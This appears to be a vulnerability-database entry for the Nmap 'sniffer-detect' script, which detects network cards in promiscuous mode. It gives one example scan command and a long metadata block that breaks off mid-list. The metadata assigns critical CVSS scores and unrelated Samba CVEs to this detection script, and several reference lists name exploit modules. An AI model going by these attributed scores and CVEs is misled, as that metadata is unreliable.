sniffer-detect NSE Script

2008-11-06T02:52:59

Description

Checks if a target on a local Ethernet has its network card in promiscuous mode. The techniques used are described at <http://www.securityfriday.com/promiscuous_detection_01.pdf>. ## Example Usage nmap -sV --script=sniffer-detect <target> ## Script Output Host script results: |_ sniffer-detect: Likely in promiscuous mode (tests: "11111111") ## Requires * [nmap](<../lib/nmap.html>) * [stdnse](<../lib/stdnse.html>) * [string](<>) * [table](<>) * * *

{"id": "NMAP:SNIFFER-DETECT.NSE", "vendorId": null, "type": "nmap", "bulletinFamily": "scanner", "title": "sniffer-detect NSE Script", "description": "Checks if a target on a local Ethernet has its network card in promiscuous mode. \n\nThe techniques used are described at <http://www.securityfriday.com/promiscuous_detection_01.pdf>.\n\n## Example Usage \n \n \n nmap -sV --script=sniffer-detect <target>\n\n## Script Output \n \n \n Host script results:\n |_ sniffer-detect: Likely in promiscuous mode (tests: \"11111111\")\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "published": "2008-11-06T02:52:59", "modified": "2015-11-05T20:41:05", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://nmap.org/nsedoc/scripts/sniffer-detect.html", "reporter": "Marek Majkowski", "references": [], "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "immutableFields": [], "lastseen": "2022-02-15T09:34:39", "viewCount": 278, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["CVE_2012_1182", "CVE_2012_1182_NONX", "SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2012:0465", "CESA-2012:0466", "CESA-2013:0506", "CESA-2013:0515", "CESA-2017:1270", "CESA-2017:1271"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-317", "CPAI-2013-2506", "CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778", "CISA:C73BC9C5DAF991808EA4A267072DA584"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2012-1182", "CVE-2017-7494"]}, {"type": "debian", "idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DLA-951-1:51380", "DEBIAN:DSA-2450-1:77F45", "DEBIAN:DSA-3860-1:8B793", "DEBIAN:DSA-3860-1:E96B1"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-1182", "DEBIANCVE:CVE-2017-7494"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}, {"type": "f5", "idList": ["F5:K13551136", "F5:K13719", "SOL13719"]}, {"type": "fedora", "idList": ["FEDORA:02833211E6", "FEDORA:095C220955", "FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:30FE721464", "FEDORA:4B045219BA", "FEDORA:77AFB20FC7", "FEDORA:77E132110D", "FEDORA:79D7720B02", "FEDORA:7D08020F24", "FEDORA:BC7B0601FC16", "FEDORA:D3501201B6"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201206-22", "GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": ["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "85D41384B88C530DBAB70791D41DFCF1CF314D456CBDB72E9AFA9ACC54A10939", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:4101563004973700412", "KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME/", "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["6443.PRM", "700127.PRM", "ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2012-0465.NASL", "CENTOS_RHSA-2012-0466.NASL", "CENTOS_RHSA-2013-0506.NASL", "CENTOS_RHSA-2013-0515.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-2450.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2012-5793.NASL", "FEDORA_2012-5805.NASL", "FEDORA_2012-5843.NASL", "FEDORA_2012-6349.NASL", "FEDORA_2012-6382.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FEDORA_2017-C729C6123C.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "GENTOO_GLSA-201206-22.NASL", "GENTOO_GLSA-201805-07.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "MACOSX_SECUPD2012-002.NASL", "MANDRIVA_MDVSA-2012-055.NASL", "NEWSTART_CGSL_NS-SA-2019-0096_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2019-0100_SAMBA4.NASL", "OPENSUSE-2012-223.NASL", "OPENSUSE-2012-224.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2012-0465.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2013-0515.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "REDHAT-RHSA-2012-0465.NASL", "REDHAT-RHSA-2012-0466.NASL", "REDHAT-RHSA-2013-0506.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SAMBA_4_6_4.NASL", "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "SL_20120410_SAMBA_ON_SL5_X.NASL", "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SOLARIS11_SAMBA_20121016.NASL", "SUSE_11_CIFS-MOUNT-120411.NASL", "SUSE_11_LDAPSMB-120415.NASL", "SUSE_CIFS-MOUNT-8058.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-1423-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL", "VIRTUOZZO_VZLSA-2017-1270.NASL", "VIRTUOZZO_VZLSA-2017-1271.NASL"]}, {"type": "nmap", "idList": ["NMAP:ACARSD-INFO.NSE", "NMAP:ADDRESS-INFO.NSE", "NMAP:AFP-BRUTE.NSE", "NMAP:AFP-LS.NSE", "NMAP:AFP-PATH-VULN.NSE", "NMAP:AFP-SERVERINFO.NSE", "NMAP:AFP-SHOWMOUNT.NSE", "NMAP:AJP-AUTH.NSE", "NMAP:AJP-BRUTE.NSE", "NMAP:AJP-HEADERS.NSE", "NMAP:AJP-METHODS.NSE", "NMAP:AJP-REQUEST.NSE", "NMAP:ALLSEEINGEYE-INFO.NSE", "NMAP:AMQP-INFO.NSE", "NMAP:ASN-QUERY.NSE", "NMAP:AUTH-OWNERS.NSE", "NMAP:AUTH-SPOOF.NSE", "NMAP:BACKORIFICE-BRUTE.NSE", "NMAP:BACKORIFICE-INFO.NSE", "NMAP:BACNET-INFO.NSE", "NMAP:BANNER.NSE", "NMAP:BITCOIN-GETADDR.NSE", "NMAP:BITCOIN-INFO.NSE", "NMAP:BITCOINRPC-INFO.NSE", "NMAP:BITTORRENT-DISCOVERY.NSE", "NMAP:BJNP-DISCOVER.NSE", "NMAP:BROADCAST-ATAOE-DISCOVER.NSE", "NMAP:BROADCAST-AVAHI-DOS.NSE", "NMAP:BROADCAST-BJNP-DISCOVER.NSE", "NMAP:BROADCAST-DB2-DISCOVER.NSE", "NMAP:BROADCAST-DHCP-DISCOVER.NSE", "NMAP:BROADCAST-DHCP6-DISCOVER.NSE", "NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-DROPBOX-LISTENER.NSE", "NMAP:BROADCAST-EIGRP-DISCOVERY.NSE", "NMAP:BROADCAST-HID-DISCOVERYD.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:BROADCAST-JENKINS-DISCOVER.NSE", "NMAP:BROADCAST-LISTENER.NSE", "NMAP:BROADCAST-MS-SQL-DISCOVER.NSE", "NMAP:BROADCAST-NETBIOS-MASTER-BROWSER.NSE", "NMAP:BROADCAST-NETWORKER-DISCOVER.NSE", "NMAP:BROADCAST-NOVELL-LOCATE.NSE", "NMAP:BROADCAST-OSPF2-DISCOVER.NSE", "NMAP:BROADCAST-PC-ANYWHERE.NSE", "NMAP:BROADCAST-PC-DUO.NSE", "NMAP:BROADCAST-PIM-DISCOVERY.NSE", "NMAP:BROADCAST-PING.NSE", "NMAP:BROADCAST-PPPOE-DISCOVER.NSE", "NMAP:BROADCAST-RIP-DISCOVER.NSE", "NMAP:BROADCAST-RIPNG-DISCOVER.NSE", "NMAP:BROADCAST-SONICWALL-DISCOVER.NSE", "NMAP:BROADCAST-SYBASE-ASA-DISCOVER.NSE", "NMAP:BROADCAST-TELLSTICK-DISCOVER.NSE", "NMAP:BROADCAST-UPNP-INFO.NSE", "NMAP:BROADCAST-VERSANT-LOCATE.NSE", "NMAP:BROADCAST-WAKE-ON-LAN.NSE", "NMAP:BROADCAST-WPAD-DISCOVER.NSE", "NMAP:BROADCAST-WSDD-DISCOVER.NSE", "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "NMAP:CASSANDRA-BRUTE.NSE", "NMAP:CASSANDRA-INFO.NSE", "NMAP:CCCAM-VERSION.NSE", "NMAP:CICS-ENUM.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CICS-USER-BRUTE.NSE", "NMAP:CICS-USER-ENUM.NSE", "NMAP:CITRIX-BRUTE-XML.NSE", "NMAP:CITRIX-ENUM-APPS-XML.NSE", "NMAP:CITRIX-ENUM-APPS.NSE", "NMAP:CITRIX-ENUM-SERVERS-XML.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:CLOCK-SKEW.NSE", "NMAP:COAP-RESOURCES.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:COUCHDB-STATS.NSE", "NMAP:CREDS-SUMMARY.NSE", "NMAP:CUPS-INFO.NSE", "NMAP:CUPS-QUEUE-INFO.NSE", "NMAP:CVS-BRUTE-REPOSITORY.NSE", "NMAP:CVS-BRUTE.NSE", "NMAP:DAAP-GET-LIBRARY.NSE", "NMAP:DAYTIME.NSE", "NMAP:DB2-DAS-INFO.NSE", "NMAP:DELUGE-RPC-BRUTE.NSE", "NMAP:DHCP-DISCOVER.NSE", "NMAP:DICOM-BRUTE.NSE", "NMAP:DICOM-PING.NSE", "NMAP:DICT-INFO.NSE", "NMAP:DISTCC-CVE2004-2687.NSE", "NMAP:DNS-BLACKLIST.NSE", "NMAP:DNS-BRUTE.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:DNS-CHECK-ZONE.NSE", "NMAP:DNS-CLIENT-SUBNET-SCAN.NSE", "NMAP:DNS-FUZZ.NSE", "NMAP:DNS-IP6-ARPA-SCAN.NSE", "NMAP:DNS-NSEC-ENUM.NSE", "NMAP:DNS-NSEC3-ENUM.NSE", "NMAP:DNS-NSID.NSE", "NMAP:DNS-RANDOM-SRCPORT.NSE", "NMAP:DNS-RANDOM-TXID.NSE", "NMAP:DNS-RECURSION.NSE", "NMAP:DNS-SERVICE-DISCOVERY.NSE", "NMAP:DNS-SRV-ENUM.NSE", "NMAP:DNS-UPDATE.NSE", "NMAP:DNS-ZEUSTRACKER.NSE", "NMAP:DNS-ZONE-TRANSFER.NSE", "NMAP:DOCKER-VERSION.NSE", "NMAP:DOMCON-BRUTE.NSE", "NMAP:DOMCON-CMD.NSE", "NMAP:DOMINO-ENUM-USERS.NSE", "NMAP:DPAP-BRUTE.NSE", "NMAP:DRDA-BRUTE.NSE", "NMAP:DRDA-INFO.NSE", "NMAP:DUPLICATES.NSE", "NMAP:EAP-INFO.NSE", "NMAP:ENIP-INFO.NSE", "NMAP:EPMD-INFO.NSE", "NMAP:EPPC-ENUM-PROCESSES.NSE", "NMAP:FCRDNS.NSE", "NMAP:FINGER.NSE", "NMAP:FINGERPRINT-STRINGS.NSE", "NMAP:FIREWALK.NSE", "NMAP:FIREWALL-BYPASS.NSE", "NMAP:FLUME-MASTER-INFO.NSE", "NMAP:FOX-INFO.NSE", "NMAP:FREELANCER-INFO.NSE", "NMAP:FTP-ANON.NSE", "NMAP:FTP-BOUNCE.NSE", "NMAP:FTP-BRUTE.NSE", "NMAP:FTP-LIBOPIE.NSE", "NMAP:FTP-PROFTPD-BACKDOOR.NSE", "NMAP:FTP-SYST.NSE", "NMAP:FTP-VSFTPD-BACKDOOR.NSE", "NMAP:FTP-VULN-CVE2010-4221.NSE", "NMAP:GANGLIA-INFO.NSE", "NMAP:GIOP-INFO.NSE", "NMAP:GKRELLM-INFO.NSE", "NMAP:GOPHER-LS.NSE", "NMAP:GPSD-INFO.NSE", "NMAP:HADOOP-DATANODE-INFO.NSE", "NMAP:HADOOP-JOBTRACKER-INFO.NSE", "NMAP:HADOOP-NAMENODE-INFO.NSE", "NMAP:HADOOP-SECONDARY-NAMENODE-INFO.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HBASE-MASTER-INFO.NSE", "NMAP:HBASE-REGION-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HNAP-INFO.NSE", "NMAP:HOSTMAP-BFK.NSE", "NMAP:HOSTMAP-CRTSH.NSE", "NMAP:HOSTMAP-ROBTEX.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-AFFILIATE-ID.NSE", "NMAP:HTTP-APACHE-NEGOTIATION.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-ASPNET-DEBUG.NSE", "NMAP:HTTP-AUTH-FINDER.NSE", "NMAP:HTTP-AUTH.NSE", "NMAP:HTTP-AVAYA-IPOFFICE-USERS.NSE", "NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE", "NMAP:HTTP-AXIS2-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BACKUP-FINDER.NSE", "NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BIGIP-COOKIE.NSE", "NMAP:HTTP-BRUTE.NSE", "NMAP:HTTP-CAKEPHP-VERSION.NSE", "NMAP:HTTP-CHRONO.NSE", "NMAP:HTTP-CISCO-ANYCONNECT.NSE", "NMAP:HTTP-COLDFUSION-SUBZERO.NSE", "NMAP:HTTP-COMMENTS-DISPLAYER.NSE", "NMAP:HTTP-CONFIG-BACKUP.NSE", "NMAP:HTTP-COOKIE-FLAGS.NSE", "NMAP:HTTP-CORS.NSE", "NMAP:HTTP-CROSS-DOMAIN-POLICY.NSE", "NMAP:HTTP-CSRF.NSE", "NMAP:HTTP-DATE.NSE", "NMAP:HTTP-DEFAULT-ACCOUNTS.NSE", "NMAP:HTTP-DEVFRAMEWORK.NSE", "NMAP:HTTP-DLINK-BACKDOOR.NSE", "NMAP:HTTP-DOMBASED-XSS.NSE", "NMAP:HTTP-DOMINO-ENUM-PASSWORDS.NSE", "NMAP:HTTP-DRUPAL-ENUM-USERS.NSE", "NMAP:HTTP-DRUPAL-ENUM.NSE", "NMAP:HTTP-ENUM.NSE", "NMAP:HTTP-ERRORS.NSE", "NMAP:HTTP-EXIF-SPIDER.NSE", "NMAP:HTTP-FAVICON.NSE", "NMAP:HTTP-FEED.NSE", "NMAP:HTTP-FETCH.NSE", "NMAP:HTTP-FILEUPLOAD-EXPLOITER.NSE", "NMAP:HTTP-FORM-BRUTE.NSE", "NMAP:HTTP-FORM-FUZZER.NSE", "NMAP:HTTP-FRONTPAGE-LOGIN.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-GIT.NSE", "NMAP:HTTP-GITWEB-PROJECTS-ENUM.NSE", "NMAP:HTTP-GOOGLE-MALWARE.NSE", "NMAP:HTTP-GREP.NSE", "NMAP:HTTP-HEADERS.NSE", "NMAP:HTTP-HP-ILO-INFO.NSE", "NMAP:HTTP-HUAWEI-HG5XX-VULN.NSE", "NMAP:HTTP-ICLOUD-FINDMYIPHONE.NSE", "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "NMAP:HTTP-IIS-SHORT-NAME-BRUTE.NSE", "NMAP:HTTP-IIS-WEBDAV-VULN.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-JOOMLA-BRUTE.NSE", "NMAP:HTTP-JSONP-DETECTION.NSE", "NMAP:HTTP-LITESPEED-SOURCECODE-DOWNLOAD.NSE", "NMAP:HTTP-LS.NSE", "NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE", "NMAP:HTTP-MALWARE-HOST.NSE", "NMAP:HTTP-MCMP.NSE", "NMAP:HTTP-METHOD-TAMPER.NSE", "NMAP:HTTP-METHODS.NSE", "NMAP:HTTP-MOBILEVERSION-CHECKER.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:HTTP-OPEN-PROXY.NSE", "NMAP:HTTP-OPEN-REDIRECT.NSE", "NMAP:HTTP-PASSWD.NSE", "NMAP:HTTP-PHP-VERSION.NSE", "NMAP:HTTP-PHPMYADMIN-DIR-TRAVERSAL.NSE", "NMAP:HTTP-PHPSELF-XSS.NSE", "NMAP:HTTP-PROXY-BRUTE.NSE", "NMAP:HTTP-PUT.NSE", "NMAP:HTTP-QNAP-NAS-INFO.NSE", "NMAP:HTTP-REFERER-CHECKER.NSE", "NMAP:HTTP-RFI-SPIDER.NSE", "NMAP:HTTP-ROBTEX-REVERSE-IP.NSE", "NMAP:HTTP-ROBTEX-SHARED-NS.NSE", "NMAP:HTTP-SAP-NETWEAVER-LEAK.NSE", "NMAP:HTTP-SECURITY-HEADERS.NSE", "NMAP:HTTP-SERVER-HEADER.NSE", "NMAP:HTTP-SHELLSHOCK.NSE", "NMAP:HTTP-SITEMAP-GENERATOR.NSE", "NMAP:HTTP-SLOWLORIS-CHECK.NSE", "NMAP:HTTP-SLOWLORIS.NSE", "NMAP:HTTP-SQL-INJECTION.NSE", "NMAP:HTTP-STORED-XSS.NSE", "NMAP:HTTP-SVN-ENUM.NSE", "NMAP:HTTP-SVN-INFO.NSE", "NMAP:HTTP-TITLE.NSE", "NMAP:HTTP-TPLINK-DIR-TRAVERSAL.NSE", "NMAP:HTTP-TRACE.NSE", "NMAP:HTTP-TRACEROUTE.NSE", "NMAP:HTTP-TRANE-INFO.NSE", "NMAP:HTTP-UNSAFE-OUTPUT-ESCAPING.NSE", "NMAP:HTTP-USERAGENT-TESTER.NSE", "NMAP:HTTP-USERDIR-ENUM.NSE", "NMAP:HTTP-VHOSTS.NSE", "NMAP:HTTP-VIRUSTOTAL.NSE", "NMAP:HTTP-VLCSTREAMER-LS.NSE", "NMAP:HTTP-VMWARE-PATH-VULN.NSE", "NMAP:HTTP-VULN-CVE2006-3392.NSE", "NMAP:HTTP-VULN-CVE2009-3960.NSE", "NMAP:HTTP-VULN-CVE2010-0738.NSE", "NMAP:HTTP-VULN-CVE2010-2861.NSE", "NMAP:HTTP-VULN-CVE2011-3192.NSE", "NMAP:HTTP-VULN-CVE2011-3368.NSE", "NMAP:HTTP-VULN-CVE2012-1823.NSE", "NMAP:HTTP-VULN-CVE2013-0156.NSE", "NMAP:HTTP-VULN-CVE2013-6786.NSE", "NMAP:HTTP-VULN-CVE2013-7091.NSE", "NMAP:HTTP-VULN-CVE2014-2126.NSE", "NMAP:HTTP-VULN-CVE2014-2127.NSE", "NMAP:HTTP-VULN-CVE2014-2128.NSE", "NMAP:HTTP-VULN-CVE2014-2129.NSE", "NMAP:HTTP-VULN-CVE2014-3704.NSE", "NMAP:HTTP-VULN-CVE2014-8877.NSE", "NMAP:HTTP-VULN-CVE2015-1427.NSE", "NMAP:HTTP-VULN-CVE2015-1635.NSE", "NMAP:HTTP-VULN-CVE2017-1001000.NSE", "NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:HTTP-VULN-CVE2017-5689.NSE", "NMAP:HTTP-VULN-CVE2017-8917.NSE", "NMAP:HTTP-VULN-MISFORTUNE-COOKIE.NSE", "NMAP:HTTP-VULN-WNR1000-CREDS.NSE", "NMAP:HTTP-WAF-DETECT.NSE", "NMAP:HTTP-WAF-FINGERPRINT.NSE", "NMAP:HTTP-WEBDAV-SCAN.NSE", "NMAP:HTTP-WORDPRESS-BRUTE.NSE", "NMAP:HTTP-WORDPRESS-ENUM.NSE", "NMAP:HTTP-WORDPRESS-USERS.NSE", "NMAP:HTTP-XSSED.NSE", "NMAP:HTTPS-REDIRECT.NSE", "NMAP:IAX2-BRUTE.NSE", "NMAP:IAX2-VERSION.NSE", "NMAP:ICAP-INFO.NSE", "NMAP:IEC-IDENTIFY.NSE", "NMAP:IKE-VERSION.NSE", "NMAP:IMAP-BRUTE.NSE", "NMAP:IMAP-CAPABILITIES.NSE", "NMAP:IMAP-NTLM-INFO.NSE", "NMAP:IMPRESS-REMOTE-DISCOVER.NSE", "NMAP:INFORMIX-BRUTE.NSE", "NMAP:INFORMIX-QUERY.NSE", "NMAP:INFORMIX-TABLES.NSE", "NMAP:IP-FORWARDING.NSE", "NMAP:IP-GEOLOCATION-GEOPLUGIN.NSE", "NMAP:IP-GEOLOCATION-IPINFODB.NSE", "NMAP:IP-GEOLOCATION-MAP-BING.NSE", "NMAP:IP-GEOLOCATION-MAP-GOOGLE.NSE", "NMAP:IP-GEOLOCATION-MAP-KML.NSE", "NMAP:IP-GEOLOCATION-MAXMIND.NSE", "NMAP:IP-HTTPS-DISCOVER.NSE", "NMAP:IPIDSEQ.NSE", "NMAP:IPMI-BRUTE.NSE", "NMAP:IPMI-CIPHER-ZERO.NSE", "NMAP:IPMI-VERSION.NSE", "NMAP:IPV6-MULTICAST-MLD-LIST.NSE", "NMAP:IPV6-NODE-INFO.NSE", "NMAP:IPV6-RA-FLOOD.NSE", "NMAP:IRC-BOTNET-CHANNELS.NSE", "NMAP:IRC-BRUTE.NSE", "NMAP:IRC-INFO.NSE", "NMAP:IRC-SASL-BRUTE.NSE", "NMAP:IRC-UNREALIRCD-BACKDOOR.NSE", "NMAP:ISCSI-BRUTE.NSE", "NMAP:ISCSI-INFO.NSE", "NMAP:ISNS-INFO.NSE", "NMAP:JDWP-EXEC.NSE", "NMAP:JDWP-INFO.NSE", "NMAP:JDWP-INJECT.NSE", "NMAP:JDWP-VERSION.NSE", "NMAP:KNX-GATEWAY-DISCOVER.NSE", "NMAP:KNX-GATEWAY-INFO.NSE", "NMAP:KRB5-ENUM-USERS.NSE", "NMAP:LDAP-BRUTE.NSE", "NMAP:LDAP-NOVELL-GETPASS.NSE", "NMAP:LDAP-ROOTDSE.NSE", "NMAP:LDAP-SEARCH.NSE", "NMAP:LEXMARK-CONFIG.NSE", "NMAP:LLMNR-RESOLVE.NSE", "NMAP:LLTD-DISCOVERY.NSE", "NMAP:LU-ENUM.NSE", "NMAP:MAXDB-INFO.NSE", "NMAP:MCAFEE-EPO-AGENT.NSE", "NMAP:MEMBASE-BRUTE.NSE", "NMAP:MEMBASE-HTTP-INFO.NSE", "NMAP:MEMCACHED-INFO.NSE", "NMAP:METASPLOIT-INFO.NSE", "NMAP:METASPLOIT-MSGRPC-BRUTE.NSE", "NMAP:METASPLOIT-XMLRPC-BRUTE.NSE", "NMAP:MIKROTIK-ROUTEROS-BRUTE.NSE", "NMAP:MMOUSE-BRUTE.NSE", "NMAP:MMOUSE-EXEC.NSE", "NMAP:MODBUS-DISCOVER.NSE", "NMAP:MONGODB-BRUTE.NSE", "NMAP:MONGODB-DATABASES.NSE", "NMAP:MONGODB-INFO.NSE", "NMAP:MQTT-SUBSCRIBE.NSE", "NMAP:MRINFO.NSE", "NMAP:MS-SQL-BRUTE.NSE", "NMAP:MS-SQL-CONFIG.NSE", "NMAP:MS-SQL-DAC.NSE", "NMAP:MS-SQL-DUMP-HASHES.NSE", "NMAP:MS-SQL-EMPTY-PASSWORD.NSE", "NMAP:MS-SQL-HASDBACCESS.NSE", "NMAP:MS-SQL-INFO.NSE", "NMAP:MS-SQL-NTLM-INFO.NSE", "NMAP:MS-SQL-QUERY.NSE", "NMAP:MS-SQL-TABLES.NSE", "NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MSRPC-ENUM.NSE", "NMAP:MTRACE.NSE", "NMAP:MURMUR-VERSION.NSE", "NMAP:MYSQL-AUDIT.NSE", "NMAP:MYSQL-BRUTE.NSE", "NMAP:MYSQL-DATABASES.NSE", "NMAP:MYSQL-DUMP-HASHES.NSE", "NMAP:MYSQL-EMPTY-PASSWORD.NSE", "NMAP:MYSQL-ENUM.NSE", "NMAP:MYSQL-INFO.NSE", "NMAP:MYSQL-QUERY.NSE", "NMAP:MYSQL-USERS.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:MYSQL-VULN-CVE2012-2122.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:NAT-PMP-MAPPORT.NSE", "NMAP:NBD-INFO.NSE", "NMAP:NBNS-INTERFACES.NSE", "NMAP:NBSTAT.NSE", "NMAP:NCP-ENUM-USERS.NSE", "NMAP:NCP-SERVERINFO.NSE", "NMAP:NDMP-FS-INFO.NSE", "NMAP:NDMP-VERSION.NSE", "NMAP:NESSUS-BRUTE.NSE", "NMAP:NESSUS-XMLRPC-BRUTE.NSE", "NMAP:NETBUS-AUTH-BYPASS.NSE", "NMAP:NETBUS-BRUTE.NSE", "NMAP:NETBUS-INFO.NSE", "NMAP:NETBUS-VERSION.NSE", "NMAP:NEXPOSE-BRUTE.NSE", "NMAP:NFS-LS.NSE", "NMAP:NFS-SHOWMOUNT.NSE", "NMAP:NFS-STATFS.NSE", "NMAP:NJE-NODE-BRUTE.NSE", "NMAP:NJE-PASS-BRUTE.NSE", "NMAP:NNTP-NTLM-INFO.NSE", "NMAP:NPING-BRUTE.NSE", "NMAP:NRPE-ENUM.NSE", "NMAP:NTP-INFO.NSE", "NMAP:NTP-MONLIST.NSE", "NMAP:OMP2-BRUTE.NSE", "NMAP:OMP2-ENUM-TARGETS.NSE", "NMAP:OMRON-INFO.NSE", "NMAP:OPENFLOW-INFO.NSE", "NMAP:OPENLOOKUP-INFO.NSE", "NMAP:OPENVAS-OTP-BRUTE.NSE", "NMAP:OPENWEBNET-DISCOVERY.NSE", "NMAP:ORACLE-BRUTE-STEALTH.NSE", "NMAP:ORACLE-BRUTE.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:ORACLE-SID-BRUTE.NSE", "NMAP:ORACLE-TNS-VERSION.NSE", "NMAP:OVS-AGENT-VERSION.NSE", "NMAP:P2P-CONFICKER.NSE", "NMAP:PATH-MTU.NSE", 